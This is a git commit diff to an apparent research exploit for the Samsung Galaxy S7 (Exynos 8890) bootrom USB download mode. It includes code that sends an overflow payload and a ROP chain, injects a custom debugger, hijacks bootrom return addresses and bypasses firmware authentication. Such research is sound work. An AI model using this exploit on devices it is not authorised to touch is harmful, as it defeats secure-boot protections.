Now booting into USB recovery. Not yet jumping back to the debugger at each boot stage
This commit is contained in:
parent
dc64defded
commit
55da2ce981
11
source/exploit/.vscode/launch.json
vendored
11
source/exploit/.vscode/launch.json
vendored
@ -28,7 +28,16 @@
|
|||||||
"program": "exploit.py",
|
"program": "exploit.py",
|
||||||
"console": "integratedTerminal",
|
"console": "integratedTerminal",
|
||||||
"justMyCode": false,
|
"justMyCode": false,
|
||||||
"args": ["--boot"]
|
"args": ["--unsecure-boot"]
|
||||||
|
},
|
||||||
|
{
|
||||||
|
"name": "Run debugger boot",
|
||||||
|
"type": "debugpy",
|
||||||
|
"request": "launch",
|
||||||
|
"program": "exploit.py",
|
||||||
|
"console": "integratedTerminal",
|
||||||
|
"justMyCode": false,
|
||||||
|
"args": ["--debugger-boot"],
|
||||||
},
|
},
|
||||||
{
|
{
|
||||||
"name": "Debug current file",
|
"name": "Debug current file",
|
||||||
|
@ -86,7 +86,7 @@ class ExynosDevice():
|
|||||||
sys.exit(0)
|
sys.exit(0)
|
||||||
else:
|
else:
|
||||||
raise e
|
raise e
|
||||||
|
|
||||||
# claim usb interface
|
# claim usb interface
|
||||||
self.handle.claimInterface(0)
|
self.handle.claimInterface(0)
|
||||||
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
|
print(f"Connected device! {hex(self.idVendor)} {hex(self.idProduct)}")
|
||||||
@ -98,12 +98,14 @@ class ExynosDevice():
|
|||||||
self.context.exit()
|
self.context.exit()
|
||||||
|
|
||||||
def write(self, data):
|
def write(self, data):
|
||||||
|
"""Write data to the device"""
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
|
||||||
assert(res == 0), "Could not perform bulk transfer"
|
assert(res == 0), "Could not perform bulk transfer"
|
||||||
return res
|
return res
|
||||||
|
|
||||||
def send_empty_transfer(self):
|
def send_empty_transfer(self):
|
||||||
|
"""Send an empty transfer (to not actually write data)"""
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
|
||||||
assert(res == 0)
|
assert(res == 0)
|
||||||
@ -127,6 +129,7 @@ class ExynosDevice():
|
|||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 10)
|
||||||
|
|
||||||
def test_bug(self):
|
def test_bug(self):
|
||||||
|
"""Verify bug existence"""
|
||||||
# Start by sending a valid packet
|
# Start by sending a valid packet
|
||||||
# Integer overflow in the size field
|
# Integer overflow in the size field
|
||||||
# unk + size + payload + header
|
# unk + size + payload + header
|
||||||
@ -147,39 +150,45 @@ class ExynosDevice():
|
|||||||
TODO not working
|
TODO not working
|
||||||
'''
|
'''
|
||||||
# construct dl_data
|
# construct dl_data
|
||||||
dpayload = struct.pack("<II", 0, len(payload) + 8 + 2)
|
dpayload = struct.pack("<II", 0, (len(payload) + 8 + 2))
|
||||||
dpayload = dpayload + payload + b"\x00" * 2 # add footer
|
dpayload = dpayload + payload + b"\x00" * 2 # add footer
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
for block in range(0, len(dpayload), BLOCK_SIZE):
|
for block in range(0, len(dpayload), BLOCK_SIZE):
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, dpayload[block:block + BLOCK_SIZE], len(dpayload[block:block + BLOCK_SIZE]), ctypes.byref(transferred), 0)
|
||||||
assert res == 0, "Error sending payload"
|
assert res == 0, "Error sending payload"
|
||||||
p_ok("Sended stage")
|
p_ok("Sent stage")
|
||||||
|
|
||||||
def unsecure_boot(self):
|
|
||||||
self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
|
def unsecure_boot(self, exploit=False):
|
||||||
time.sleep(2)
|
'''
|
||||||
self.connect_device()
|
Do a normal boot process, with or without exploit.
|
||||||
|
'''
|
||||||
|
if exploit:
|
||||||
|
self.exploit(open("../../dump/exynos-usbdl/payloads/Exynos8890_unsecure_boot_usb.bin", "rb").read())
|
||||||
|
time.sleep(2)
|
||||||
|
self.connect_device()
|
||||||
# self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin")
|
# self.send_normal_stage("/home/eljakim/Source/Samsung_S7/source/S7/g930f_latest/g930f_sboot.bin.1.bin")
|
||||||
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
|
||||||
|
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
|
||||||
|
# self.send_normal_stage(open("../../dump/rom.bin.1.bin", "rb").read())
|
||||||
# wait_disconnect()
|
# wait_disconnect()
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
self.connect_device()
|
self.connect_device()
|
||||||
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
|
||||||
|
# self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
|
||||||
# wait_disconnect()
|
# wait_disconnect()
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
self.connect_device()
|
self.connect_device()
|
||||||
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
|
||||||
|
# self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
|
||||||
# wait_disconnect()
|
# wait_disconnect()
|
||||||
time.sleep(2)
|
time.sleep(2)
|
||||||
self.connect_device()
|
self.connect_device()
|
||||||
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.4.bin", "rb").read())
|
||||||
|
# self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
|
||||||
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
|
|
||||||
# self.send_normal_stage(open("../S7/bl31.bin", "rb").read())
|
|
||||||
# self.send_normal_stage(open("../S7/sboot.bin.3.bin", "rb").read())
|
|
||||||
# self.send_normal_stage(open("../S7/sboot.bin.4.bin", "rb").read())
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
||||||
def exploit(self, payload: bytes):
|
def exploit(self, payload: bytes):
|
||||||
'''
|
'''
|
||||||
Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
|
Exploit the Exynos device, payload of 502 bytes max. This will send stage1 payload.
|
||||||
@ -234,7 +243,9 @@ class ExynosDevice():
|
|||||||
transferred = ctypes.c_int(0)
|
transferred = ctypes.c_int(0)
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
|
||||||
assert res == 0, "Error sending ROP chain"
|
assert res == 0, "Error sending ROP chain"
|
||||||
|
return
|
||||||
|
|
||||||
|
|
||||||
def usb_write(self, data):
|
def usb_write(self, data):
|
||||||
assert len(data) <= 0x200, "Data too big"
|
assert len(data) <= 0x200, "Data too big"
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
@ -243,13 +254,15 @@ class ExynosDevice():
|
|||||||
assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
|
assert transferred.value == len(data), f"Invalid transfered size {transferred.value} != {len(data)}"
|
||||||
return transferred.value
|
return transferred.value
|
||||||
|
|
||||||
|
|
||||||
def usb_read(self, size):
|
def usb_read(self, size):
|
||||||
transferred = ctypes.c_int()
|
transferred = ctypes.c_int()
|
||||||
buf = ctypes.c_buffer(b"", size)
|
buf = ctypes.c_buffer(b"", size)
|
||||||
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300)
|
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 300)
|
||||||
assert res == 0, f"Error receiving data {res}"
|
assert res == 0, f"Error receiving data {res}"
|
||||||
return buf.raw[:transferred.value]
|
return buf.raw[:transferred.value]
|
||||||
|
|
||||||
|
|
||||||
def setup_concrete_device(self, concrete_device : ConcreteDevice):
|
def setup_concrete_device(self, concrete_device : ConcreteDevice):
|
||||||
#Setup architecture
|
#Setup architecture
|
||||||
concrete_device.arch = QL_ARCH.ARM64
|
concrete_device.arch = QL_ARCH.ARM64
|
||||||
@ -265,6 +278,7 @@ class ExynosDevice():
|
|||||||
#Overwrite all calls to make the concrete target function properly
|
#Overwrite all calls to make the concrete target function properly
|
||||||
concrete_device.copy_functions()
|
concrete_device.copy_functions()
|
||||||
|
|
||||||
|
|
||||||
def usb_debug(self):
|
def usb_debug(self):
|
||||||
"""
|
"""
|
||||||
Function to debug USB behaviour. Sends and receives data in continuous flow.
|
Function to debug USB behaviour. Sends and receives data in continuous flow.
|
||||||
@ -291,6 +305,7 @@ class ExynosDevice():
|
|||||||
_recv_data()
|
_recv_data()
|
||||||
count += 1
|
count += 1
|
||||||
|
|
||||||
|
|
||||||
def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False):
|
def dump_memory(self, start: hex=0x0, end: hex=0x0206ffff, write=False):
|
||||||
"""
|
"""
|
||||||
Dumps memory from the device.
|
Dumps memory from the device.
|
||||||
@ -312,11 +327,6 @@ class ExynosDevice():
|
|||||||
f.write(dumped)
|
f.write(dumped)
|
||||||
return dumped
|
return dumped
|
||||||
|
|
||||||
# transferred = ctypes.c_int()
|
|
||||||
# stack_pointer = 0x02021810
|
|
||||||
# for block in range(0x2020000, 0x2200000, 0x200):
|
|
||||||
# stack_pointer += 0x200
|
|
||||||
# dumped += self.cd.memdump_region(block, 0x200)
|
|
||||||
|
|
||||||
def setup_guppy_debugger(self):
|
def setup_guppy_debugger(self):
|
||||||
"""
|
"""
|
||||||
@ -356,32 +366,34 @@ class ExynosDevice():
|
|||||||
|
|
||||||
_initial_run_debugger()
|
_initial_run_debugger()
|
||||||
_setup_debugger()
|
_setup_debugger()
|
||||||
|
|
||||||
|
|
||||||
|
def relocate_debugger(self):
|
||||||
|
# Seems to be cleared upon cache clearing??
|
||||||
|
if os.getenv("USER") == "eljakim":
|
||||||
|
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
|
||||||
|
else:
|
||||||
|
try:
|
||||||
|
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
|
||||||
|
except Exception as e:
|
||||||
|
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
self.cd.memwrite_region(0x020c0000, debugger_reloc)
|
||||||
|
self.usb_write(b"FLSH") # Flush cache
|
||||||
|
self.cd.restore_stack_and_jump(0x020c0000)
|
||||||
|
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
|
||||||
|
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
|
||||||
|
|
||||||
|
|
||||||
def dumb_interact(self, dump_imems=False):
|
def dumb_interact(self, dump_imems=False):
|
||||||
'''
|
'''
|
||||||
Room for playing around with the debugger
|
Room for playing around with the debugger on the phone.
|
||||||
'''
|
'''
|
||||||
self.cd.arch_dbg.state.auto_sync = False
|
self.cd.arch_dbg.state.auto_sync = False
|
||||||
self.cd.arch_dbg.state.auto_sync_special = False
|
self.cd.arch_dbg.state.auto_sync_special = False
|
||||||
logger.debug('State after setting up initial debugger')
|
logger.debug('State after setting up initial debugger')
|
||||||
self.cd.arch_dbg.state.print_ctx()
|
self.cd.arch_dbg.state.print_ctx()
|
||||||
|
|
||||||
def relocate_debugger():
|
|
||||||
# Seems to be cleared upon cache clearing??
|
|
||||||
if os.getenv("USER") == "eljakim":
|
|
||||||
debugger_reloc = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/reloc_debugger.bin", "rb").read()
|
|
||||||
else:
|
|
||||||
try:
|
|
||||||
debugger_reloc = open("../../dump/reloc_debugger.bin", "rb").read()
|
|
||||||
except Exception as e:
|
|
||||||
print(f'Are you missing your debugger? Please ensure it is present in dump/debugger.bin. {e}')
|
|
||||||
sys.exit(0)
|
|
||||||
|
|
||||||
self.cd.memwrite_region(0x020c0000, debugger_reloc)
|
|
||||||
self.usb_write(b"FLSH") # Flush cache
|
|
||||||
self.cd.restore_stack_and_jump(0x020c0000)
|
|
||||||
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
|
|
||||||
self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
|
|
||||||
|
|
||||||
def first_debugger():
|
def first_debugger():
|
||||||
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
|
debugger = open("/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin", "rb").read()
|
||||||
@ -390,20 +402,24 @@ class ExynosDevice():
|
|||||||
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
|
assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
|
||||||
self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)
|
self.cd.relocate_debugger(0x206d000 + 0x1000, 0x2069000, 0x206d000)
|
||||||
|
|
||||||
# relocate_debugger()
|
# self.relocate_debugger()
|
||||||
DEBUGGER_ADDR = 0x2069000 #0x020c0000
|
DEBUGGER_ADDR = 0x2069000 #0x020c0000
|
||||||
|
|
||||||
|
### Get whereabouts of the debugger and current processor state
|
||||||
logger.debug('State after relocating debugger')
|
logger.debug('State after relocating debugger')
|
||||||
self.cd.arch_dbg.state.print_ctx()
|
self.cd.arch_dbg.state.print_ctx()
|
||||||
|
|
||||||
def memdump_imem():
|
def memdump_imem():
|
||||||
|
"""
|
||||||
|
Dumps the internal memory of the device (0x2020000 - 0x2070000).
|
||||||
|
"""
|
||||||
dumped = b""
|
dumped = b""
|
||||||
for block in range(0x2020000, 0x2070000, 0x200):
|
for block in range(0x2020000, 0x2070000, 0x200):
|
||||||
# print(hex(block))
|
# print(hex(block))
|
||||||
dumped += self.cd.memdump_region(block, 0x200)
|
dumped += self.cd.memdump_region(block, 0x200)
|
||||||
return dumped
|
return dumped
|
||||||
|
|
||||||
AUTH_BL1 = 0x00012848
|
AUTH_BL1 = 0x00012848 # Location of the authentication function
|
||||||
def auth_bl1(lr=0x2069000):
|
def auth_bl1(lr=0x2069000):
|
||||||
# Load the firmware
|
# Load the firmware
|
||||||
self.cd.arch_dbg.state.X0 = 1
|
self.cd.arch_dbg.state.X0 = 1
|
||||||
@ -413,18 +429,17 @@ class ExynosDevice():
|
|||||||
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
||||||
assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
|
assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
|
||||||
|
|
||||||
BOOT_BL1 = 0x00019310
|
BOOT_BL1 = 0x00019310 # Location of the boot function
|
||||||
def boot_bl1(lr=0x2069000):
|
def boot_bl1(lr=0x2069000):
|
||||||
self.cd.arch_dbg.state.LR = lr
|
self.cd.arch_dbg.state.LR = lr
|
||||||
self.cd.restore_stack_and_jump(BOOT_BL1)
|
self.cd.restore_stack_and_jump(BOOT_BL1)
|
||||||
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
||||||
|
|
||||||
JUMP_BL1 = 0x000002c0
|
JUMP_BL1 = 0x000002c0 # Location of the function to start the BL1 boot
|
||||||
def jump_bl1(lr):
|
def jump_bl1(lr):
|
||||||
self.cd.arch_dbg.state.LR = lr
|
self.cd.arch_dbg.state.LR = lr
|
||||||
self.cd.restore_stack_and_jump(JUMP_BL1)
|
self.cd.restore_stack_and_jump(JUMP_BL1)
|
||||||
|
|
||||||
|
|
||||||
# Always hijack rom_usb_download function:
|
# Always hijack rom_usb_download function:
|
||||||
rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
|
rom_usb_download = self.cd.memdump_region(0x020200dc, 4)
|
||||||
self.cd.memwrite_region(0x020200dc, p32(0x2069000))
|
self.cd.memwrite_region(0x020200dc, p32(0x2069000))
|
||||||
@ -432,7 +447,7 @@ class ExynosDevice():
|
|||||||
# Try loading bl1
|
# Try loading bl1
|
||||||
bl1 = open("../S7/bl1.bin", "rb").read()
|
bl1 = open("../S7/bl1.bin", "rb").read()
|
||||||
self.cd.memwrite_region(0x02021800, bl1)
|
self.cd.memwrite_region(0x02021800, bl1)
|
||||||
self.usb_write(b"FLSH") # Flush cache
|
self.usb_write(b"FLSH") # Flush cache, as Frederic does
|
||||||
self.cd.test_connection()
|
self.cd.test_connection()
|
||||||
auth_bl1(DEBUGGER_ADDR)
|
auth_bl1(DEBUGGER_ADDR)
|
||||||
# boot_bl1(DEBUGGER_ADDR)
|
# boot_bl1(DEBUGGER_ADDR)
|
||||||
@ -462,39 +477,15 @@ class ExynosDevice():
|
|||||||
# self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
|
# self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
|
||||||
# self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
|
# self.cd.memwrite_region(0x2022948 + 4, self.cd.arch_dbg.sc.branch_absolute(DEBUGGER_ADDR))
|
||||||
|
|
||||||
# Patch stupid error funciton
|
# Patch stupid error function
|
||||||
# self.usb_write(b"FLSH") # Flush cache
|
# self.usb_write(b"FLSH") # Flush cache
|
||||||
|
|
||||||
# Download next stage?
|
# Download next stage?
|
||||||
lr = self.cd.arch_dbg.state.LR
|
lr = self.cd.arch_dbg.state.LR
|
||||||
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
|
# self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
pass
|
pass
|
||||||
|
|
||||||
# Using keystone, look for each msr instruction (AARCH64, LE)
|
|
||||||
|
|
||||||
|
|
||||||
# If wanting to modify the binary
|
|
||||||
# bl1 = bl1[:0x1C23] + b'\xaa' + bl1[0x1C24:]
|
|
||||||
|
|
||||||
|
|
||||||
imem1 = memdump_imem()
|
|
||||||
|
|
||||||
|
|
||||||
auth_bl1(0x020c0000)
|
|
||||||
|
|
||||||
# Dump memory
|
|
||||||
# imem2 = memdump_imem()
|
|
||||||
# with open("/tmp/imem1_bad.bin", "wb") as f:
|
|
||||||
# f.write(imem1)
|
|
||||||
# with open("/tmp/imem2_bad.bin", "wb") as f:
|
|
||||||
# f.write(imem2)
|
|
||||||
|
|
||||||
# Overwrite jump back to the debugger from functions encountered during jump_bl1
|
# Overwrite jump back to the debugger from functions encountered during jump_bl1
|
||||||
# self.cd.memwrite_region(0x02020108, p32(0x020c0000)) # Hijack some weird function, original 0x00005790
|
|
||||||
|
|
||||||
self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
|
self.cd.memwrite_region(0x020200e8, p32(0x020c0000)) # Overwrite line register to jump back to debugger (see code flow at 0x02021800 +0x10, after the bl1 has been written to memory at this address)
|
||||||
self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
|
self.cd.memwrite_region(0x020200dc, p32(0x020c0000))
|
||||||
|
|
||||||
@ -502,8 +493,6 @@ class ExynosDevice():
|
|||||||
print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
|
print(f"From = {hex(self.cd.arch_dbg.state.LR - 4)} X0 = {hex(self.cd.arch_dbg.state.X0)}")
|
||||||
self.cd.restore_stack_and_jump(0x00000314)
|
self.cd.restore_stack_and_jump(0x00000314)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
jump_bl1(0x020c0000)
|
jump_bl1(0x020c0000)
|
||||||
def handle_weird_brom():
|
def handle_weird_brom():
|
||||||
while True:
|
while True:
|
||||||
@ -517,20 +506,13 @@ class ExynosDevice():
|
|||||||
pass
|
pass
|
||||||
handle_weird_brom()
|
handle_weird_brom()
|
||||||
|
|
||||||
# Parse pagetables
|
### For getting special registers. Non-writeable registers are detected. (UXN, PXN, etc)
|
||||||
# self.cd.jump_to(0x2069000)
|
# self.cd.jump_to(0x2069000)
|
||||||
# assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
# assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
||||||
# self.cd.fetch_special_regs()
|
# self.cd.fetch_special_regs()
|
||||||
|
|
||||||
# Address to download to
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
|
self.cd.memwrite_region(0x02022a08, self.cd.arch_dbg.sc.mov_0_w0_ins + self.cd.arch_dbg.sc.ret_ins)
|
||||||
|
|
||||||
# testfun(0x2069000)
|
|
||||||
|
|
||||||
self.cd.arch_dbg.state.X0 = 1
|
self.cd.arch_dbg.state.X0 = 1
|
||||||
self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
|
self.cd.restore_stack_and_jump(self.cd.arch_dbg.state.LR)
|
||||||
self.usb_read(0x200) # GiAs
|
self.usb_read(0x200) # GiAs
|
||||||
@ -538,7 +520,8 @@ class ExynosDevice():
|
|||||||
self.cd.arch_dbg.state.LR = 0x2069000
|
self.cd.arch_dbg.state.LR = 0x2069000
|
||||||
self.cd.restore_stack_and_jump(0x00000314)
|
self.cd.restore_stack_and_jump(0x00000314)
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
### UXN and PXN seem to be present over the USB stack (02021800+)
|
||||||
shellcode = f"""
|
shellcode = f"""
|
||||||
ldr x0, debugger_addr
|
ldr x0, debugger_addr
|
||||||
blr x0
|
blr x0
|
||||||
@ -551,11 +534,7 @@ class ExynosDevice():
|
|||||||
self.cd.jump_to(0x2021800)
|
self.cd.jump_to(0x2021800)
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
||||||
# load bl31
|
|
||||||
|
|
||||||
# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
|
# bl31 = bl31[:0x14] + self.cd.arch_dbg.sc.branch_absolute(0x2069000) + bl31[0x24:] # Overwrite jump back to debugger
|
||||||
|
|
||||||
# # Write bl31 at 0x02021800 and authenticate
|
# # Write bl31 at 0x02021800 and authenticate
|
||||||
|
|
||||||
auth_bl1(0x020c0000)
|
auth_bl1(0x020c0000)
|
||||||
@ -564,23 +543,7 @@ class ExynosDevice():
|
|||||||
jump_bl1(0x02021800)
|
jump_bl1(0x02021800)
|
||||||
pass
|
pass
|
||||||
|
|
||||||
# OLD
|
# VERY OLD
|
||||||
|
|
||||||
def memdump_try():
|
|
||||||
self.cd.arch_dbg.state.LR = 0x020200e8
|
|
||||||
self.cd.restore_stack_and_jump(0x02021810)
|
|
||||||
stack_pointer = 0x02021810
|
|
||||||
dumped = b""
|
|
||||||
for block in range(0x2020000, 0x2200000, 0x200):
|
|
||||||
stack_pointer += 0x200
|
|
||||||
self.cd.arch_dbg.state.print_ctx()
|
|
||||||
print(hex(block))
|
|
||||||
dumped += self.cd.memdump_region(block, 0x200)
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# self.cd.restore_stack_and_jump(0x02021810)
|
|
||||||
|
|
||||||
#000125b4
|
#000125b4
|
||||||
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
|
# self.cd.arch_dbg.state.LR = 0x2069000 #jump back to debugger when finished
|
||||||
@ -588,36 +551,85 @@ class ExynosDevice():
|
|||||||
# self.cd.restore_stack_and_jump(0x000125b4)
|
# self.cd.restore_stack_and_jump(0x000125b4)
|
||||||
|
|
||||||
|
|
||||||
|
def debugger_boot(self):
|
||||||
auth_bl1()
|
"""
|
||||||
|
Boot into USB recovery mode using the debugger.
|
||||||
# auth_bl1()
|
"""
|
||||||
jump_bl1()
|
### Setup debugger
|
||||||
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
|
self.setup_guppy_debugger()
|
||||||
self.cd.arch_dbg.state.print_ctx()
|
|
||||||
|
|
||||||
def jump_bl31():
|
|
||||||
self.cd.arch_dbg.state.LR = 0x2069000
|
|
||||||
self.cd.restore_stack_and_jump(0x02021810)
|
|
||||||
bl31 = open("../S7/bl31.bin", "rb").read()
|
|
||||||
|
|
||||||
self.cd.memwrite_region(0x02021800, bl31)
|
self.cd.arch_dbg.state.auto_sync = False
|
||||||
jump_bl31()
|
self.cd.arch_dbg.state.auto_sync_special = False
|
||||||
assert self.usb_read(0x200) == b"GiAs", "not jumped back to debugger?"
|
logger.debug('State after setting up initial debugger')
|
||||||
self.cd.arch_dbg.state.print_ctx()
|
self.cd.arch_dbg.state.print_ctx()
|
||||||
|
|
||||||
|
DEBUGGER_ADDR = 0x2069000 #0x020c0000
|
||||||
|
|
||||||
|
### Overwrite boot_usb_ra to our debugger
|
||||||
|
self.cd.test_connection()
|
||||||
|
hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
|
||||||
|
self.cd.memwrite_region(0x02020f60, p64(0x2069000))
|
||||||
|
|
||||||
|
### Set link register and boot into the USB function
|
||||||
|
BOOT_USB_FUNCTION = 0x000064e0
|
||||||
|
self.cd.arch_dbg.state.LR = DEBUGGER_ADDR
|
||||||
|
self.cd.restore_stack_and_jump(BOOT_USB_FUNCTION)
|
||||||
|
time.sleep(1)
|
||||||
|
self.connect_device()
|
||||||
|
|
||||||
|
# Setup jump and authentication
|
||||||
|
AUTH_BL1 = 0x00012848
|
||||||
|
def auth_bl1(lr=0x2069000):
|
||||||
|
# Load the firmware
|
||||||
|
self.cd.arch_dbg.state.X0 = 1
|
||||||
|
self.cd.arch_dbg.state.X1 = 1
|
||||||
|
self.cd.arch_dbg.state.LR = lr #jump back to debugger when finished
|
||||||
|
self.cd.restore_stack_and_jump(AUTH_BL1)
|
||||||
|
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
||||||
|
### Check if authentication was successful - X0 should not be 0??
|
||||||
|
# assert self.cd.arch_dbg.state.X0 == 0, "auth_bl1 returned with error!"
|
||||||
|
|
||||||
|
JUMP_BL1 = 0x000002c0
|
||||||
|
def jump_bl1(lr):
|
||||||
|
self.cd.arch_dbg.state.LR = lr
|
||||||
|
self.cd.restore_stack_and_jump(JUMP_BL1)
|
||||||
|
|
||||||
|
# Send boot stage 1
|
||||||
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.1.bin", "rb").read())
|
||||||
|
# self.send_normal_stage(open("../S7/bl1.bin", "rb").read())
|
||||||
|
|
||||||
# memdump_try()
|
assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
|
||||||
# auth_bl1()
|
auth_bl1(DEBUGGER_ADDR)
|
||||||
self.cd.arch_dbg.state.print_ctx()
|
time.sleep(1)
|
||||||
|
|
||||||
#authenticate it
|
self.cd.memwrite_region(0x02020f60, hijacked_usb_ra)
|
||||||
|
|
||||||
|
self.usb_write(b"FLSH") # Flush cache
|
||||||
|
jump_bl1(DEBUGGER_ADDR)
|
||||||
|
time.sleep(2)
|
||||||
|
self.connect_device()
|
||||||
|
# self.connect_device()
|
||||||
|
|
||||||
|
|
||||||
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
|
||||||
|
time.sleep(2)
|
||||||
|
self.connect_device()
|
||||||
|
|
||||||
|
self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
|
||||||
